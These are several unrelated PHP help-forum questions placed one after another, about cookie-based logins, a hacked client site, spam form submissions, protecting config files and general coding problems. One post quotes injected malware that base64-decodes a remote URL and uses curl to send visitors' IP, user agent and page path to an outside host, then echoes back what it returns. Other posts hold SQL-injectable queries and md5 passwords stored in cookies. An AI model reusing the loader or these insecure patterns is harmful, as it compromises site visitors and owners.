PHP - How Can This Code Be Hacked?

I am using php 5 and I am having issues with cookies. I have looked at the help pages here but still stuck. A site had been hacked via a database and I am making it more secure with the use of session control ip address and cookies. The issue is this I need to run a database query to test if the two cookies set match that with the data in the database. I am using the following code in the head section.
Code: [Select]
<?php
session_start();
$session = session_id();
$ip = $_SERVER['REMOTE_ADDR'];
$user = stripslashes(trim($_POST['user']));
$pass = stripslashes(trim($_POST['pass']));
$username="$user";
$encrypt_user=md5($username);
$password="$pass";
$encrypt_password=md5($password);
include 'config.php';
$query = "SELECT * FROM `users`WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'";
$result = mysql_query($query) or die (mysql_error());
if (mysql_num_rows($result)>0){
while($row = mysql_fetch_row($result)){
// set the cookies
setcookie("cookie[pas]", "$encrypt_password");
setcookie("cookie[user]", "$encrypt_user");
 $query = ("UPDATE`users`SET`sid`='$session', `ip` = '$ip'WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'");
$result = mysql_query($query) or die (mysql_error());
}
}
 else {
echo 'No rows found';
}
?>
This works fine now when I add this bit of code I can see the cookie name and value.
Code: [Select]
<?php
echo "$ip<br>";
if (isset($_COOKIE['cookie'])) {
    foreach ($_COOKIE['cookie'] as $name => $value) {
        $name = htmlspecialchars($name);
        $value = htmlspecialchars($value);
        echo "$name : $value <br />\n";
    }
}
?>
I can see the ip address and the two cookies named user and pass but when I try to get the individual cookie details nothing comes out and this is the issue as I need to test each of the two individual cookies against the info in the database so I can include pages to make it all secure. I have tried
Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$encrypt_user";
    }
?>encrypt_user being the username from the form. I have also tried

Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$_COOKIE['user']";
    }
?>
These are not showing. I do not need to see it just run a query to test that each cookie matches the encrypt data in the MySQL. Any ideas would be great if you can help and if not have a great weekend 

The code below was inserted into every single index.php on one of my clients sites.  It went through and every single index.php page (in each folder) had that following code put in.  It was
strange. As far as I can tell there are no FTP logs, besides my own IP.   This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a
full security audit yet.  What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <?
is inserted right after it.  I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange.

Any advice on how this is generally done, and anyone with similar issues?
Code: [Select]
<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

I have a php form submission on this website: www.judelawllc.com

There are several required fields...and when I try to get around them, I am unable to?? Yet, over the last week...we have been getting upwards of 500 submissions that are completely blank? I don't understand how that is possible...or how to correct it. I have tried to add a captcha to the form to add further protection, but the captcha image is too big for the space I have to put this form. I don't like the layout of this site, but I am stuck with it for now...could you let me know what information I can supply you to help figure out how this is happening?

Thank you in advance!

Hey guys I have a simple question,

I have a Config.php file that connects to mysql database on my server...

Something like this (modified data, of course):


<?php
// database information
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '******';
$dbname = 'databasename';
?>

Can a hacker access those variables? How can I protect this?
Ideas, suggestions?

Thanks in advance!

Hey, friends.  I have some trouble on the server front.  My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit.  I'm looking for a way to search for any and all php files contained in multiple directories with specific names.  For instance, I have found a commonality in relation to where these malicious files are placed, such as:
Code: [Select]
/some/dir/img/somename.phpor:
Code: [Select]
/some/dir/js/somename.php
Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"?  I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep.  I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories. 

Any and all help is appreciated.  Hackers suck.

Hi, I have some code which displays my blog post in a foreach loop, and I want to add some social sharing code(FB like button, share on Twitter etc.), but the problem is the way I have my code now, creates 3 instances of the sharing buttons, but if you like one post, all three are liked and any thing you do affects all of the blog post. How can I fix this?


<?php
include ("includes/includes.php");

$blogPosts = GetBlogPosts();

foreach ($blogPosts as $post)
{
echo "<div class='post'>";
echo "<h2>" . $post->title . "</h2>";
echo "<p class='postnote'>" . $post->post . "</p";
echo "<span class='footer'>Posted By: " . $post->author . "</span>";
echo "<span class='footer'>Posted On: " . $post->datePosted . "</span>";
echo "<span class='footer'>Tags: " . $post->tags . "</span>";
echo '
<div class="addthis_toolbox addthis_default_style ">
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
<a class="addthis_button_tweet"></a>
<a class="addthis_counter addthis_pill_style"></a>
</div>
<script type="text/javascript">var addthis_config = {"data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=webguync"></script>';

echo "</div>";
}


?>

I have the following code in html:

<html>
<head>
<script type="text/javascript">
<!--
function delayer(){
    window.location = "http://VARIABLEVALUE.mysite.com"
}
//-->
</script>
<title>Redirecting ...</title>
</head>
<body onLoad="setTimeout('delayer()', 1000)">



<script type="text/javascript">
var sc_project=71304545;
var sc_invisible=1;
var sc_security="9c433fretre";
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script><noscript>
<div
class="statcounter"><a title="vBulletin statistics"
href="http://statcounter.com/vbulletin/"
target="_blank"><img class="statcounter"
src="http://c.statcounter.com/71304545/0/9c433fretre/1/"
alt="vBulletin statistics" ></a></div></noscript>


</body>
</html>

Is a basic html webpage with a timer redirect script and a stascounter code.

I know a bit about html and javascript, but almost nothing about php.

My question is:

How a can convert this html code into a php file, in order to send a variable value using GET Method and display this variable value inside the javascript code where says VARIABLEVALUE.

Thanks in adavance for your help.

Advance thank you.

Can you help please.

The error.....

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, string given in C:\wamp\www\test_dabase.php on line 24

code.
Code: [Select]
<?php

//database connection.
$DB = mysql_connect("localhost","root") or die(mysql_error());

if($DB){

//database name.
$DB_NAME="mysql";

//select database and name.
$CON=mysql_select_db($DB_NAME,$DB)or die(mysql_error()."\nPlease change database name");


// if connection.
}if($CON){
    
    //show tables.
  $mysql_show="SHOW TABLES";
    
    //select show and show.
      $mysql_select2="mysql_query(".$mysql_show.") or die(mysql_error())";
    
    }
    
    //if allowed to show.
    if($mysql_select2){
        
        //while it and
    while($data=mysql_fetch_assoc($mysql_select2)){
        
        //show it.
        echo $data;
        
        }
    }    
    ?>

hey gurus, i am a newbie php coder.. i am learning by example.

what i am trying to do is write a piece of code which will alter 3 tables (user, bonus_credit, bonus_credit_usage)

----------------------------------------------------------------
the table structure that will be used is as follows:

user.bonus_credit
user.ID

bonus_credit.bonusCode
bonus_credit.qty
bonus_credit.value

bonus_credit_usage.bonusCode
bonus_credit_usage.usedBy

----------------------------------------------------------------
so lets say, in bonus_credit i have the following
bonusCode = 'facebook' (this is the code they have to type to redeem the bonus
qty = '10' ( number of times the bonusCode can be redeemed, but same person can't redeem it more than once)
value = '5' (this is the  amount of bonus_credit for each qty)

Now, I need to write a code that check to see if the code has been redeemed in the bonus_credit_usage table and if the user.ID exists in this table as bonus_code_usage.usedBy, then give an error that its already been used and if it hasn't been used, then subtract 1 from qty, add ID to usedBy and then add the value to the bonus_credit

-----------------------
i have started the steps just to create a simple textbox and entering a numeric value to bonus_credit, and that works.. but now i have to use JOIN and IF and ELSE.. which is a little too advanced for me.. so i'd appreciate a guide as i write the code.

if(isset($_REQUEST['btnBonus']))

{

$bonus_credit = addslashes($_REQUEST['bonusCode']);

$query = "update user set bonus_credit=bonus_credit+'".$bonus_credit."' where id='".$_SESSION['SESS_USERID']."'";

echo "<script>window.location='myreferrals.php?msgs=2';</script>";

mysql_query($query) or die(mysql_error());

}

Hi, I need to insert some code into my current form code which will check to see if a username exist and if so will display an echo message. If it does not exist will post the form (assuming everything else is filled in correctly). I have tried some code in a few places but it doesn't work correctly as I get the username message exist no matter what. I think I am inserting the code into the wrong area, so need assistance as to how to incorporate the username check code.

$sql="select * from Profile where username = '$username';
$result = mysql_query( $sql, $conn )
      or die( "ERR: SQL 1" );
if(mysql_num_rows($result)!=0)
{
process form
}
else
{
echo "That username already exist!";
}


the current code of the form


<?PHP
//session_start();
require_once "formvalidator.php";
$show_form=true;

if (!isset($_POST['Submit'])) {



$human_number1 = rand(1, 12);



$human_number2 = rand(1, 38);



$human_answer = $human_number1 + $human_number2;



$_SESSION['check_answer'] = $human_answer;
}

if(isset($_POST['Submit']))
{





if (!isset($_SESSION['check_answer'])) {
echo "<p>Error: Answer session not set</p>";
}


if($_POST['math'] != $_SESSION['check_answer']) {
echo "<p>You did not pass the human check.</p>";
exit();
}


   $validator = new FormValidator();
    $validator->addValidation("FirstName","req","Please fill in FirstName");







$validator->addValidation("LastName","req","Please fill in LastName");
$validator->addValidation("UserName","req","Please fill in UserName");
$validator->addValidation("Password","req","Please fill in a Password");
$validator->addValidation("Password2","req","Please re-enter your password");
$validator->addValidation("Password2","eqelmnt=Password","Your passwords do not match!");
$validator->addValidation("email","email","The input for Email should be a valid email value");
$validator->addValidation("email","req","Please fill in Email");
$validator->addValidation("Zip","req","Please fill in your Zip Code");
$validator->addValidation("Security","req","Please fill in your Security Question");
$validator->addValidation("Security2","req","Please fill in your Security Answer");
    if($validator->ValidateForm())
    {
        $con = mysql_connect("localhost","uname","pw") or die('Could not connect: ' . mysql_error());
        mysql_select_db("beatthis_beatthis") or die(mysql_error());
$FirstName=mysql_real_escape_string($_POST['FirstName']); //This value has to be the same as in the HTML form file
$LastName=mysql_real_escape_string($_POST['LastName']); //This value has to be the same as in the HTML form file
$UserName=mysql_real_escape_string($_POST['UserName']); //This value has to be the same as in the HTML form file
$Password= md5($_POST['Password']); //This value has to be the same as in the HTML form file
$Password2= md5($_POST['Password2']); //This value has to be the same as in the HTML form file
$email=mysql_real_escape_string($_POST['email']); //This value has to be the same as in the HTML form file
$Zip=mysql_real_escape_string($_POST['Zip']); //This value has to be the same as in the HTML form file
$Birthday=mysql_real_escape_string($_POST['Birthday']); //This value has to be the same as in the HTML form file
$Security=mysql_real_escape_string($_POST['Security']); //This value has to be the same as in the HTML form file
$Security2=mysql_real_escape_string($_POST['Security2']); //This value has to be the same as in the HTML form file



$sql="INSERT INTO Profile (`FirstName`,`LastName`,`Username`,`Password`,`Password2`,`email`,`Zip`,`Birthday`,`Security`,`Security2`) VALUES ('$FirstName','$LastName','$UserName','$Password','$Password2','$email','$Zip','$Birthday','$Security','$Security2')"; 
//echo $sql;
if (!mysql_query($sql,$con)) {

 die('Error: ' . mysql_error());

} else{



mail('email@gmail.com','A profile has been submitted!',$FirstName.' has submitted their profile',$body);

echo "<h3>Your profile information has been submitted successfully.</h3>";
}

mysql_close($con);
        $show_form=false;
    }
    else
    {
        echo "<h3 class='ErrorTitle'>Validation Errors:</h3>";

        $error_hash = $validator->GetErrors();
        foreach($error_hash as $inpname => $inp_err)
        {
            echo "<p class='errors'>$inpname : $inp_err</p>\n";
        }        
    }
}

if(true == $show_form)
{
?>

Hi,

Look at this code below:

Code: [Select]
<?php function outputModule($moduleID, $moduleName, $sessionData) 
{ 

    if(!count($sessionData)) 
    { 
        return false; 
    } 

    $markTotal = 0; 
    $markGrade = 0; 
    $weightSession = 0; 
    $grade = ""; 
    $sessionsHTML = ""; 

    foreach($sessionData as $session) 
    { 

        $sessionsHTML .= "<p><strong>Session:</strong> {$session['SessionId']} <strong>Session Mark:</strong> {$session['Mark']}</strong> <strong>Session Weight Contribution</strong> {$session['SessionWeight']}%</p>\n"; 
        $markTotal += round($session['Mark'] / 100 * $session['SessionWeight']); 
        $weightSession  += ($session['SessionWeight']); 
        $markGrade = round($markTotal /  $weightSession * 100); 
             
        if ($markGrade >= 70) 
        { 
            $grade = "A"; 
        } 

        else if ($markGrade >= 60 && $markGrade <= 69) 
        { 
            $grade = "B"; 
        } 

        else if ($markGrade >= 50 && $markGrade <= 59) 
        { 
            $grade = "C"; 
        } 

        else if ($markGrade >= 40 && $markGrade <= 49) 
        { 
            $grade = "D"; 
        } 

        else if ($markGrade >= 30 && $markGrade <= 39) 
        { 
            $grade = "E"; 
        } 

        else if ($markGrade >= 0 && $markGrade <= 29) 
        { 
            $grade = "F"; 
        } 
              

    $moduleHTML = "<p><br><strong>Module:</strong> {$moduleID} - {$moduleName} <strong>Module Mark:</strong> {$markTotal} <strong>Mark Percentage:</strong> {$markGrade} <strong>Grade:</strong> {$grade} </p>\n"; 

    return $moduleHTML . $sessionsHTML; 
} 

$output = ""; 

$studentId = false; 
$courseId  = false; 
$moduleId  = false; 

while ($row = mysql_fetch_array($result)) 
{ 

    if($studentId != $row['StudentUsername']) 
    { 

        //Student has changed 
        $studentId = $row['StudentUsername']; 

        $output .= "<p><strong>Student:</strong> {$row['StudentForename']} {$row['StudentSurname']} ({$row['StudentUsername']})\n"; 

    } 
         
    if($courseId != $row['CourseId']) 
    { 

        //Course has changed 
        $courseId = $row['CourseId']; 

        $output .= "<br><strong>Course:</strong> {$row['CourseId']} - {$row['CourseName']} <strong>Course Mark</strong> <strong>Grade</strong>  <br><strong>Year:</strong> {$row['Year']} </p>\n"; 

    } 

    if($moduleId != $row['ModuleId']) 
    { 

        //Module has changed 
        if(isset($sessionsAry)) //Don't run function for first record 
        { 

            //Get output for last module and sessions 
            $output .= outputModule($moduleId, $moduleName, $sessionsAry); 
        } 

        //Reset sessions data array and Set values for new module 

        $sessionsAry = array(); 
        $moduleId    = $row['ModuleId']; 
        $moduleName  = $row['ModuleName']; 
    } 
         
    //Add session data to array for current module 
         
    $sessionsAry[] = array('SessionId'=>$row['SessionId'], 'Mark'=>$row['Mark'], 'SessionWeight'=>$row['SessionWeight']); 
         
}    //Get output for last module 

$output .= outputModule($moduleId, $moduleName, $sessionsAry); 

//Display the output 
echo $output; 

}
      }
  }
    ?>
This code allallows me to make calculations and display a student's course and linked with it the course the modules in the course and linked with modules are all the sessions. It is able to display what marks each student have got for each module and session.

Now look at code below, it is able to display modules and in those modules the sessions that link to those modules:

  Code: [Select]
<?php if($moduleId != $row['ModuleId']) 
    { 

        //Module has changed 
        if(isset($sessionsAry)) //Don't run function for first record 
        { 

            //Get output for last module and sessions 
            $output .= outputModule($moduleId, $moduleName, $sessionsAry); 
        } 

        //Reset sessions data array and Set values for new module 

        $sessionsAry = array(); 
        $moduleId    = $row['ModuleId']; 
        $moduleName  = $row['ModuleName']; 
    } 
         
    //Add session data to array for current module 
         
    $sessionsAry[] = array('SessionId'=>$row['SessionId'], 'Mark'=>$row['Mark'], 'SessionWeight'=>$row['SessionWeight']); 
         
}
What I want to know is how can I do something similar for course so that it picks out the right modules depending on the course it displays. There maybe some code that needs to be added in the function.

Can I combine also HTML code in PHP function?
For example, can a PHP function include HTML form and the PHP code to handle this form?

If yes, this will make my main code much more smaller and readable.

If not, is there a way to define an "external macro" like, which allow me to replace pre-defined lines of code with short alias?


 

Can you help me integrate this code :

<form method="post" action="submit.php">
<input type="checkbox" class="required" /> Click to check
<br />
<input disabled="disabled" type='submit' id="submitBtn" value="Submit">
</form>

In to this Contact Form code, please?

<form action="../page.php?page=1" method="post" name="contact_us" onSubmit="return capCheck(this);">
<table cellpadding="5" width="100%">
<tr>
<td width="10" class="required_field">*</td>
<td width="80">Your Name</td>
<td><input type="text" name="name" maxlength="40" style="width:400px;/></td>
</tr>
<tr>
<td class="required_field">*</td>
<td>Email Address</td>
<td><input type="text" name="email" maxlength="40" style="width:400px;/></td>
</tr>
<tr>
<td></td>
<td>Comments:</td>
<td><textarea name="comments" style="width: 400px; height: 250px;"></textarea></td>
</tr>
</table>
</form

I use this type of a code to send automatic emails from my website:

Code: [Select]
$headers = ;
$headers .= ;
$to = ;

Click here to go to Google.

", $headers);

I am having hard time figuring out how to do hyperlink on words (like here). If I do something like this:

Code: [Select]
<a href='http://www.google.com'>here</a>
it spits out that exact thing out.

Thanks you for your input

Alright so I'm attempting to save config data via php. Bellow is the code I currently have, however I'm afraid that when I "flip the switch" and use it that it will error out because of the <?php and ?> tags inside of it... Ideas, suggestions?


$config = '../includes/config.php';
$fh = fopen($config, 'w');
$data = '
<?php

$dbhost = "'.$database_host.'";
$dbuser = "'.$database_username.'";
$dbpass = "'.$database_password.'";
$dbname = "'.$database_name.'";

$key = "'.$site_key.'";
$cron_key = "'.$database_cron_key.'";
?>
';
fwrite($fh, $data);
fclose($fh);